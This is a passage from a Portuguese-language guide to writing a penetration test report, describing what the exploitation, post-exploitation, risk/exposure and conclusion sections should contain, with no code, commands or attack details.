    Referem-se às tentativas de invasão realizadas diretamente contra os sistemas. Essa seção deve especificar quais máquinas foram testadas e classificá-las como exploráveis ou não. Para os alvos onde a exploração foi bem-sucedida, serão apresentados os detalhes técnicos de cada tentativa: que tipo de ataque foi utilizado, qual foi o resultado, qual o nível de acesso conquistado (por exemplo, usuário comum, administrador ou SYSTEM), e se foi possível escalar privilégios a partir disso. Também devem ser citadas possíveis medidas corretivas já aplicadas, sugestões de mitigação para o caso específico e alternativas de controle compensatório, caso a correção imediata não seja viável. Cada caso deve fazer referência direta à vulnerabilidade descrita anteriormente.

  • Ataques Indiretos

    Englobam técnicas que envolvem interação com os usuários ou seus dispositivos, e não com os servidores diretamente. São divididos em:

    • Engenharia Social

      detalhamento de campanhas de phishing, contatos falsos ou outras tentativas de enganar usuários. Devem ser apresentados o cronograma das ações, os alvos definidos, a taxa de sucesso em relação às tentativas e os acessos obtidos a partir disso.

    • Ataques ao Lado do Cliente

      uso de exploits que afetam aplicações que rodam no computador do usuário (como leitores de PDF, players de mídia, etc.). Assim como na engenharia social, são incluídos os alvos, datas, taxa de sucesso e tipo de acesso conquistado.

    • Exploração via Navegador

      ataques que aproveitam falhas em navegadores ou extensões. O relatório deve conter os mesmos elementos anteriores: tempo das tentativas, alvos visados, resultado das ações e os privilégios adquiridos.


Essa seção é central no relatório técnico, pois demonstra de forma prática o impacto das vulnerabilidades e serve como base para justificar as recomendações de segurança.



Pós-Exploração

Esta seção do relatório tem como objetivo principal demonstrar o impacto real das ações ofensivas no contexto da organização avaliada. Enquanto as partes anteriores abordaram os aspectos técnicos das falhas e os acessos obtidos, aqui a ênfase está em conectar essas conquistas com riscos diretos ao negócio. A ideia é evidenciar, com provas práticas como capturas de tela, arquivos acessados e exemplos de uso de contas privilegiadas, o que essas explorações poderiam significar se fossem realizadas por um agente malicioso real.


Entre os pontos que devem ser apresentados:

  • Caminho de Escalada de Privilégios:

    descrição detalhada das técnicas utilizadas para alcançar níveis mais altos de acesso, como conta de administrador ou acesso ao sistema operacional como SYSTEM.

  • Coleta de Informações Sensíveis:

    qualquer dado considerado crítico pelo cliente — como credenciais, documentos confidenciais ou dados pessoais, deve ser mostrado, sempre com contexto de onde foi encontrado e por que é valioso. Também deve ser atribuído um grau de criticidade a esse conteúdo.

  • Acesso a Sistemas de Missão Crítica:

    se durante o teste foi possível interagir com servidores ou aplicações centrais para o funcionamento do negócio, isso deve ser documentado, com evidências que comprovem o acesso.

  • Exposição de Dados Protegidos:

    registros que deveriam estar sob controle de acesso rigoroso, como bases de dados com informações sensíveis, também devem ser destacados.

  • Outros Sistemas ou Informações Obtidas:

    além dos alvos definidos, qualquer outro recurso acessado inadvertidamente também deve ser relatado.

  • Persistência:

    técnicas utilizadas para manter o acesso mesmo após reinícios ou mudanças no ambiente, como backdoors, usuários ocultos ou tarefas agendadas.

  • Exfiltração:

    demonstração da capacidade de extrair dados do ambiente da empresa sem ser detectado, com simulações de envio de arquivos para fora da rede.

  • Avaliação das Defesas:

    esta parte analisa a eficácia dos mecanismos de segurança existentes, incluindo tanto medidas preventivas (como antivírus, segmentações e políticas) quanto mecanismos de resposta (como alertas, logs, monitoramento e reação do time de segurança). Caso alguma proteção tenha funcionado corretamente durante o teste, isso também deve ser citado como exemplo positivo.


Essa etapa final do relatório técnico é fundamental para mostrar ao cliente que os riscos não são apenas teóricos — são reais e podem comprometer dados, processos e operações se não forem tratados adequadamente.



Risco/Exposição

Com base nas evidências coletadas nas etapas anteriores — identificação de falhas, exploração prática e avaliação de impacto —, esta parte do relatório tem como objetivo quantificar o risco envolvido. Ela combina os resultados técnicos com fatores de criticidade definidos na fase de pré-engajamento, permitindo à organização visualizar o peso de cada vulnerabilidade em termos de negócio.


Esse cruzamento de dados fornece ao cliente uma ferramenta útil para decidir o que corrigir primeiro, considerando não apenas a gravidade técnica, mas também o valor da informação exposta e os processos afetados.


A avaliação do risco é apresentada nas seguintes dimensões:

  • Probabilidade do Incidente:

    estimativa de com que frequência a falha explorada poderia ser usada em um cenário real de ataque.

  • Potencial de Perda:

    cálculo aproximado do prejuízo que a organização poderia sofrer caso o ataque fosse bem-sucedido, incluindo impacto financeiro, reputacional e operacional.

  • Causa do Risco:

    identificação da origem do problema — por exemplo, falha de configuração, negligência em atualizações, política de acesso mal definida etc.

  • Processos Deficientes:

    análise de práticas ou procedimentos que contribuíram para a exposição, revelando fragilidades no modelo de segurança ou gestão da TI.


Essa abordagem ajuda a alinhar segurança com estratégia de negócio, dando clareza para onde direcionar recursos e esforços de mitigação.



Conclusão

A conclusão oferece um resumo geral da atividade, reforçando os pontos mais relevantes identificados ao longo do teste. Ela retoma os destaques do trabalho ofensivo, como os acessos obtidos, os riscos concretos validados e as falhas mais significativas, ao mesmo tempo em que aponta caminhos possíveis para fortalecer a segurança da organização.


O encerramento deve manter um tom construtivo e propositivo, sinalizando que os problemas detectados são oportunidades de melhoria. O relatório se encerra com uma recomendação clara: a adoção de práticas contínuas de avaliação, monitoramento e fortalecimento da segurança, reforçando o compromisso com a resiliência do ambiente no médio e longo prazo.